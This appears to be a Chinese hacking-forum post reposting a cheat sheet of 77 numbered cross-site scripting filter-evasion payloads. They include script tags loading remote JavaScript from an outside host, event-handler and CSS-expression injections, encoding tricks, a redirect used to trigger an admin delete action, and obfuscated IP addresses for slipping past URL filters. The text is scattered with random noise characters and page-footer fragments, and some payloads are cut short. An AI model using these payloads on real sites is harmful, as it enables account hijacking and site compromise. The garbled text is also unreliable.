貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。! ^. L1 G* [- V5 c0 E
(1)普通的XSS JavaScript注入
8 Q$ H( T& `0 q0 ^<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
5 Z8 [2 v+ }( Y- h( F(2)IMG标签XSS使用JavaScript命令
/ |7 X$ @4 m8 ]! M+ ]! g* N0 f/ l' J<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>7 `/ U! |( \; \5 _0 |
(3)IMG标签无分号无引号
0 _1 k% z. W! T* d7 f5 q<IMG SRC=javascript:alert(‘XSS’)>! w8 _8 D, [! h* ^. a
(4)IMG标签大小写不敏感
7 _. x+ N q" n% U J6 X<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
6 Q7 O1 p; _: t5 c2 X9 ]5 f- L; {(5)HTML编码(必须有分号)
$ {3 x& ^4 s9 n& T- d<IMG SRC=javascript:alert(“XSS”)>
' Q$ G3 b$ j: m: c) v( `(6)修正缺陷IMG标签! P' E% B& m. }* k" g
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>$ N9 a* D' t6 S8 \0 k% J
+ M+ ^" E4 B- i" [# K- M6 p
. F4 l/ f- T$ ~& d5 ]# x(7)formCharCode标签(计算器)
" R* u/ c& I. M- j! i/ P# D<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>* j3 J% ~! D) s8 ~
(8)UTF-8的Unicode编码(计算器)
9 v/ B5 q6 ~( ~ r6 @/ [9 T<IMG SRC=jav..省略..S')>& g2 ]1 l U1 w" t
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)' w4 P6 E! ?, v$ @% J
<IMG SRC=jav..省略..S')>
: Y- {4 k$ F |! e4 p(10)十六进制编码也是没有分号(计算器)
0 Y* A0 e& S4 G# N+ N9 g* v<IMG SRC=java..省略..XSS')>
8 b, X( [+ I- j(11)嵌入式标签,将Javascript分开
5 Z7 o% h/ p- X; r& `) Y6 J<IMG SRC=”jav ascript:alert(‘XSS’);”>! ~! h# }$ S! l; Y$ ?
(12)嵌入式编码标签,将Javascript分开' ?9 T4 r8 [1 D; c& G' |
<IMG SRC=”jav ascript:alert(‘XSS’);”>4 f) W A0 j* {! a
(13)嵌入式换行符
7 n7 d( ? \ J l& \4 ~1 U<IMG SRC=”jav ascript:alert(‘XSS’);”>' h6 F. \) K4 }
(14)嵌入式回车- r1 {$ b2 c4 ?# G. C
<IMG SRC=”jav ascript:alert(‘XSS’);”>6 j' q5 R+ W5 d+ e* t$ I
(15)嵌入式多行注入JavaScript,这是XSS极端的例子5 O! q2 A! u6 E* D' R- @' P' W
<IMG SRC=”javascript:alert(‘XSS‘)”>8 A [5 q% H. E8 r+ a6 c; x
(16)解决限制字符(要求同页面)
; o u! x- Z8 R! m# o% j& d<script>z=’document.’</script>
O' }5 @2 l4 K+ t; |. G; P! I* v<script>z=z+’write(“‘</script>
4 e1 ?( a3 t7 T, A/ @5 z; @% \<script>z=z+’<script’</script>. P/ G9 f8 @) z/ K! r9 A
<script>z=z+’ src=ht’</script>
6 v7 J+ ]" ?# H+ o+ I% `. y<script>z=z+’tp://ww’</script>1 F$ K3 V" |& l3 Z4 D" K1 t* p7 V* [5 s
<script>z=z+’w.shell’</script>: V0 i5 q7 H% L. U
<script>z=z+’.net/1.’</script>8 _0 I- G) m; J
<script>z=z+’js></sc’</script>! P9 G3 l2 ]/ ?' m- m, N( Z
<script>z=z+’ript>”)’</script>
3 d& T6 p0 y$ _4 v. R/ H5 a- N<script>eval_r(z)</script>2 \1 K9 y2 P, Q9 G
(17)空字符12-7-1 T00LS - Powered by Discuz! Board
; h, w* ~1 _2 N9 w2 t" s5 c* ^https://www.t00ls.net/viewthread ... table&tid=15267 2/64 r: D" I( E4 W/ |& }2 J, e
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
6 x& C0 c- l* L7 r# a' X(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
% X$ m1 p( v9 G2 N; J, Z* ^perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
( V8 z O! n( o(19)Spaces和meta前的IMG标签0 `6 _) S1 f* Q( x! l) S
<IMG SRC=” javascript:alert(‘XSS’);”>
7 C: I! X% m* N9 @" q(20)Non-alpha-non-digit XSS
/ Q% J6 S5 t- i5 c; c<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>9 @2 }# M8 Z2 ?3 ~, W0 G+ K
(21)Non-alpha-non-digit XSS to 2) {8 n5 V; T; N$ P# P; n; c( b, U
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>1 n6 T3 q; m& p5 h2 j. t$ T5 B
(22)Non-alpha-non-digit XSS to 3
0 V- A4 D3 \7 i( @<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>3 R4 }4 u. m# D. a' \: u/ T: w% F
(23)双开括号
8 Y/ Q+ R% m% j* S! w4 g/ _0 e<<SCRIPT>alert(“XSS”);//<</SCRIPT>
& { u" T \! Q9 F6 S( h(24)无结束脚本标记(仅火狐等浏览器)
7 A2 g" H9 D2 Z* ^* V8 `<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
9 f f9 a) x. p, P% E: f" o(25)无结束脚本标记2
' }# h( ?6 I" q g7 g7 q/ [<SCRIPT SRC=//3w.org/XSS/xss.js>% `' o1 t9 B* x7 s
(26)半开的HTML/JavaScript XSS8 s9 y3 y0 o, A- j
<IMG SRC=”javascript:alert(‘XSS’)”% h/ n; @% X! [- w- z9 ?0 k
(27)双开角括号& `2 t5 }1 r0 q) K) o7 ]; s( H8 m
<iframe src=http://3w.org/XSS.html <
' k) O3 k5 h4 ~+ F4 x(28)无单引号 双引号 分号
, ^3 k8 @5 m+ C: K+ ?<SCRIPT>a=/XSS/5 E; u7 E: U2 W8 l) T+ N" ~7 O
alert(a.source)</SCRIPT>
. f9 ^8 J/ S8 }. F5 R(29)换码过滤的JavaScript5 w; _1 T: a/ `3 a. Z
\”;alert(‘XSS’);//
0 g$ H# P. G; @' w( J7 G) L0 V(30)结束Title标签
. c- W' k1 L3 r. [* K</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
4 Z/ L; w8 X" d(31)Input Image
7 u, O0 p+ G' D! J* y+ i<INPUT SRC=”javascript:alert(‘XSS’);”>0 B, @8 G( X. _0 t
(32)BODY Image) ~5 m b6 y( q. @ n: k
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
& f4 G7 Y4 W- m(33)BODY标签
7 p. d! v( G; ?* T% K8 N+ Y<BODY(‘XSS’)>+ M6 v8 _* d' V& \1 }
(34)IMG Dynsrc
7 e6 H. j6 n+ H& ~8 t<IMG DYNSRC=”javascript:alert(‘XSS’)”>
9 u0 o, U: l0 a! ?0 _7 k% S(35)IMG Lowsrc
, l6 ]) j3 A3 W<IMG LOWSRC=”javascript:alert(‘XSS’)”>( V& x, B$ b) F l6 d9 Z
(36)BGSOUND
' R* }0 G+ o0 W' m& C7 k<BGSOUND SRC=”javascript:alert(‘XSS’);”>( ]/ J$ c1 [1 S; a4 I1 k' B; z
(37)STYLE sheet* L5 n* E0 X I0 h8 y6 Q
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
2 S# g! r0 t/ t6 W, d4 j(38)远程样式表7 n6 ]* }6 d5 j% R
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>2 z3 U9 w A- N
(39)List-style-image(列表式)/ A9 n4 b* r. M6 ~
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
- o9 ~( V# f3 h# _6 g9 y(40)IMG VBscript
% [. L4 B$ \5 X: k8 P<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS8 F0 C7 G; h7 Z0 B B
(41)META链接url
3 N* ?+ B; F- k" [
+ I2 ^! W! a6 t4 ~! A! Y0 u+ s: y6 l! I; A6 w" @
<META HTTP-EQUIV=”refresh” CONTENT=”0;
0 d( }+ t7 J0 ^% qURL=http://;URL=javascript:alert(‘XSS’);”>
) B. k; \- l( q& j0 r- }. |) G- T( U(42)Iframe
- [6 |: I' f( D' Y# }<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>" L. Y$ w) j2 @% K* y7 K
(43)Frame
+ k5 m& I) Y' W9 W<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board
r& H# K0 e/ |2 ~+ yhttps://www.t00ls.net/viewthread ... table&tid=15267 3/6
( t6 N3 s5 X7 K/ r( E W5 U(44)Table
0 p# U. H! k L6 b<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
; V/ b8 J- T, b! D. U) p9 M) J; [9 e(45)TD2 W0 S+ l' [* h3 Y4 r
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>4 B/ D! q3 Y M9 \. }" O% K. X* \9 C
(46)DIV background-image/ E# I' t/ w1 [; j$ v- C
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>, X: y& F2 T- s" q
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-" Z7 N* A3 _) t( x/ a
8&13&12288&65279)+ d! ^; }% _5 u4 m, b& I: `
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>/ j4 [$ Y3 b% U9 {8 W5 r: G3 c ~, X
(48)DIV expression
1 |% G5 Q8 ^' d8 Y4 W* y<DIV STYLE=”width: expression_r(alert(‘XSS’));”>' P3 T$ J1 ~# b! l- ~
(49)STYLE属性分拆表达
# ?- v+ Y0 I9 [- B# Y, E C# d- x% Q<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>5 E! h* ^/ V Z" J3 Z: T
(50)匿名STYLE(组成:开角号和一个字母开头)6 k& d/ D3 t$ i3 \% D7 [
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
6 i7 b4 ?# j5 v8 l. M- r(51)STYLE background-image! x6 k5 _! j4 o8 X4 O7 `8 Y! O- F8 j$ @
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A, Z) |1 a2 d* P' q' t- @3 d. _
CLASS=XSS></A>8 S0 {8 s) Y L1 U
(52)IMG STYLE方式" z( o8 H# [7 j0 M( x& e8 h
exppression(alert(“XSS”))’>) C& g1 r& h8 r1 \9 g3 l% y; v
(53)STYLE background- F6 |/ f# @5 n& `0 E
<STYLE><STYLE0 H6 m* a' r" }8 L. `
type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
e0 ?( E3 M; s& P8 Q9 n(54)BASE
6 P+ j* t( |; o/ v- s! Z<BASE HREF=”javascript:alert(‘XSS’);//”>8 f- G% k; ?9 h& j/ S, i) q9 o
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS6 E6 p& l% y9 J& G) O. j5 L4 g5 c( ^
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>2 y5 Y5 f# @, ]5 ?. _8 ]
(56)在flash中使用ActionScrpt可以混进你XSS的代码/ Z6 s! M) x7 ]. f& z5 ^
a=”get”;7 Y b& k4 p! \. R% ^
b=”URL(\”";
" E. q3 `& L; Fc=”javascript:”;5 D' t$ c% I: B5 C2 N
d=”alert(‘XSS’);\”)”;% H. H7 ~9 E- ]. W1 B2 m
eval_r(a+b+c+d);% N! V. d$ a+ Y9 C
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
8 A0 r, C8 R* _<HTML xmlns:xss>
4 t" U4 |! u z( p4 f9 d% F' M# w" i! {<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
9 W7 A4 z7 D+ ]- ~<xss:xss>XSS</xss:xss>
) H+ Z' U0 X( w2 D6 Z</HTML>
5 U8 J1 S6 E- b1 _# X(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
( F4 B: r' p. d/ _. m9 d<SCRIPT SRC=””></SCRIPT>
! e8 K& J: P" ~ ]: Y(59)IMG嵌入式命令,可执行任意命令. k! v- b+ y9 f9 K
<IMG SRC=”http://www.XXX.com/a.php?a=b”>3 h# L5 m: T6 P% }
(60)IMG嵌入式命令(a.jpg在同服务器)
7 }1 a8 P0 j7 ~2 A5 W' g' ~Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
! n* V2 f3 [. @1 g0 n7 V/ H(61)绕符号过滤( ^1 X _' z0 C9 ~; f* \% ]# a! N- i
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>. k1 \+ e# d( z* E* d: R) u8 o% {0 r% K
(62)
& }# j8 F; C7 z1 t0 H$ a<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>& P0 s0 `+ `0 J6 \0 w& R( s
(63)
v/ G5 u L1 |0 I+ \9 O ^% _<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT> w* }/ z' U- t; Y2 o2 E; o
(64)
% I8 ]' @& q& R3 D<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
! k8 D3 i" x: D( X% x# }7 J(65)
6 j1 t+ k, ?1 B% x8 M' ]<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
9 ^, ~& g. I' ](66)12-7-1 T00LS - Powered by Discuz! Board( l: H+ W, @! Z9 I# i
https://www.t00ls.net/viewthread ... table&tid=15267 4/6
- Q0 p3 Q" ~' `' X% n<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT> A9 w( i1 ^' F' C( _4 y
(67)( { c9 r# f$ q4 E
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”>
& n% _: W, }) l F" ~( I</SCRIPT>
* }6 I n8 @7 o! B3 C(68)URL绕行( {) W6 L5 t! b
<A HREF=”http://127.0.0.1/”>XSS</A>" Q& ]$ D5 @# L2 `+ v
(69)URL编码! h* G. x$ f. r) |
<A HREF=”http://3w.org”>XSS</A>
7 N+ q' O7 _: Z W; X+ F(70)IP十进制) M, n' c/ v8 V6 m! u9 T
<A HREF=”http://3232235521″>XSS</A>
) N! s" a! [, ~$ W% }, v; x; r(71)IP十六进制1 r7 |, I2 C( t$ d/ U6 P' }2 j
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>7 j# U( \, C/ J1 m
(72)IP八进制
/ M# x/ b5 t; p* h: h: {* d8 s, o<A HREF=”http://0300.0250.0000.0001″>XSS</A>* i8 q" A9 U: k6 A* Z6 V j
(73)混合编码
4 }/ g5 M# U( ^( w j6 y<A HREF=”h
3 M7 M9 r7 w E- K. Att p://6 6.000146.0×7.147/”">XSS</A>
M! L; l, K- o0 t8 x(74)节省[http:]3 {, E# K( G5 ^
<A HREF=”//www.google.com/”>XSS</A>
5 \+ H8 C0 E3 @2 N% c0 S(75)节省[www]
8 P/ c k3 b4 X; q8 {) j<A HREF=”http://google.com/”>XSS</A>
2 j+ X8 M, h) m4 [(76)绝对点绝对DNS
. D' _8 n6 M2 b/ Y<A HREF=”http://www.google.com./”>XSS</A>7 W H3 ~: c/ c4 `/ e4 o0 d: n- n
(77)javascript链接( R. I& W4 d, U: Z: d4 m5 i4 U x
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>
$ E9 P( o2 m5 P, m& T, b' B# e, @- V k
' c/ n* n3 _6 d9 h% {5 f, }% U. {- ?原文地址:http://fuzzexp.org/u/0day/?p=14
, |. O1 B- x3 W0 O" D$ J2 o" |- U n, J5 V5 g6 C! s
|
发表于 2013-4-19 19:22:37
收藏
支持
反对